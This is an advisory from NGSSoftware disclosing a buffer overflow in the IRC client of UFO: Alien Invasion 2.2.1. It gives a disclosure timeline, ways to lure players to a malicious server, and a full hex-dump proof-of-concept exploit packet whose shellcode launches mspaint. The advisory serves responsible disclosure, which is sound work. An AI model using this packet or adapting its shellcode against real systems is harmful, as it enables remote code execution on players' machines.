UFO - Alien Invasion Code Execution

`Remote Arbitrary Code Execution Vulnerability in UFO: Alien Invasion  
--------------------------------------------------------------------  
  
June 18th, 2010  
  
=======  
Summary  
=======  
Name: Remote Arbitrary Code Execution Vulnerability in UFO: Alien Invasion  
Release Date: June 18th, 2010  
Discoverer: Jason Geffner  
Version Affected: UFO: Alien Invasion 2.2.1  
(version previous to UFO: Alien Invasion 2.2.1 not tested)  
Risk: Very High  
Status: Published  
  
============  
Introduction  
============  
This paper discusses how an unprivileged remote attacker can execute arbitrary  
code on networked players' computers. This vulnerability was responsibly  
disclosed to the UFO: Alien Invasion project leader and this advisory was not  
released until a stable fixed build of the game was released.  
  
==========  
Background  
==========  
"UFO: Alien Invasion is an open source strategy video game in which the player  
fights aliens that are trying to take control of the Earth. The game is heavily  
influenced by the X-COM series (mostly by UFO: Enemy Unknown). It is based on a  
modified id Tech 2 engine, and runs on Linux, Microsoft Windows, and Mac OS X  
for both PPC and Intel Macs. UFO:AI has been nominated for 'Best project for  
Gamers' in the Sourceforge 2007 and 2008 Community Choice Awards and was  
positively noted by Linux Journal." [1]  
  
========  
Timeline  
========  
04/29/08 UFO: Alien Invasion 2.2.1 released  
10/28/09 Remote arbitrary code execution vulnerability discovered in UFO: Alien  
Invasion 2.2.1  
10/31/09 Detailed vulnerability report responsibly disclosed to the UFO: Alien  
Invasion project leader  
11/02/09 Fix checked into source code trunk  
06/18/10 Stable build of UFO: Alien Invasion 2.3 released, fixing vulnerability  
06/18/10 Advisory released  
  
=============  
Vulnerability  
=============  
The IRC client component of UFO: Alien Invasion 2.2.1 contains multiple  
security vulnerabilities that allow a malicious IRC server to remotely execute  
arbitrary code on the client's system. There are numerous ways that an attacker  
could cause a player to connect to a malicious server, for example:  
  
- Perform a man-in-the-middle attack to inject IRC server responses into the  
TCP stream.  
- Use DNS poisoning to redirect the player's client from the real  
irc.freenode.org server to the attacker's malicious server.  
- Use the in-game "rcon" functionality against a server to remotely issue the  
command "irc_connect <attacker's server>" (passwords for rcon can be  
brute-forced and/or sniffed over the network since they're sent in  
plaintext).  
- Use social engineering to convince a player to press ~ and type "irc_connect  
<attacker's server>".  
  
There are numerous buffer overflow vulnerabilities that can be exploited in the  
IRC client component. The following vulnerability can be exploited in a single  
packet:  
  
The Irc_Proto_ParseServerMsg(...) function parses server messages of up to 1024  
bytes in length and writes to an irc_server_msg_t structure. This structure's  
last field is a 512-byte string buffer. A malformed server response can cause  
Irc_Proto_ParseServerMsg(...) to write past the end of the irc_server_msg_t  
structure and overwrite the return address for Irc_Logic_ReadMessages(...).  
  
=======  
Exploit  
=======  
See below for a proof-of-concept exploit packet for UFO: Alien Invasion 2.2.1  
for Windows. The payload will launch "mspaint.exe" and terminate the UFO: Alien  
Invasion process.  
  
00000000: 30 30 31 20 3a 41 41 41 41 41 41 41 41 41 41 41 001 :AAAAAAAAAAA  
00000010: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000020: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000030: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000040: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000050: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000060: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000070: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000080: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000090: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
000000a0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
000000b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
000000c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
000000d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
000000e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
000000f0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000100: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000110: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000120: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000130: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000140: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000150: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000160: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000170: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000180: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000190: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
000001a0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
000001b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
000001c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
000001d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
000001e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
000001f0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000200: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000210: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA  
00000220: 41 41 41 41 41 41 41 41 41 41 41 41 41 28 50 d2 AAAAAAAAAAAAA(P.  
00000230: 0a 2b c9 83 e9 cd e8 ff ff ff ff c0 5e 81 76 0e .+..........^.v.  
00000240: 76 83 85 b6 83 ee fc e2 f4 8a 6b 0c b6 76 83 e5 v.........k..v..  
00000250: 3f 93 b2 57 d2 fd d1 b5 3d 24 8f 0e e4 62 08 f7 ?..W....=$...b..  
00000260: 9e 79 34 cf 90 47 7c b4 76 da bf e4 ca 74 af a5 .y4..G|.v....t..  
00000270: 77 b9 8e 84 71 94 73 d7 e1 fd d1 95 3d 34 bf 84 w...q.s.....=4..  
00000280: 66 fd c3 fd 33 b6 f7 cf b7 a6 d3 0e fe 6e 08 dd f...3........n..  
00000290: 96 77 50 66 8a 3f 08 b1 3d 77 55 b4 49 47 43 29 .wPf.?..=wU.IGC)  
000002a0: 77 b9 8e 84 71 4e 63 f0 42 75 fe 7d 8d 0b a7 f0 w...qNc.Bu.}....  
000002b0: 54 2e 08 dd 92 77 50 e3 3d 7a c8 0e ee 6a 82 56 T....wP.=z...j.V  
000002c0: 3d 72 08 84 66 ff c7 a1 92 2d d8 e4 ef 2c d2 7a =r..f....-...,.z  
000002d0: 56 2e dc df 3d 64 68 03 eb 1c 82 08 33 cf 83 85 V...=dh.....3...  
000002e0: b6 26 eb b4 3d 19 04 7a 63 cd 73 30 14 20 eb 23 .&..=..zc.s0. .#  
000002f0: 23 cb 1e 7a 63 4a 85 f9 bc f6 78 65 c3 73 38 c2 #..zcJ....xe.s8.  
00000300: a5 04 ec ef b6 25 7c 50 db 05 f3 e4 df 18 f7 ab .....%|P........  
00000310: d3 0e e6 85 b6 0d 0a .......  
  
==========  
Conclusion  
==========  
Safe string handling functions should be used instead of their standard CRT  
equivalents or inlined string copies.  
  
===============  
Fix Information  
===============  
This issue has now been resolved. UFO: Alien Invasion 2.3 can be downloaded  
from http://ufoai.ninex.info/wiki/index.php/Download  
  
==========  
References  
==========  
[1] http://en.wikipedia.org/wiki/UFO:_Alien_Invasion  
  
NGSSoftware Insight Security Research  
http://www.ngssoftware.com/  
http://www.databasesecurity.com/  
http://www.nextgenss.com/  
+44(0)208 401 0070  
`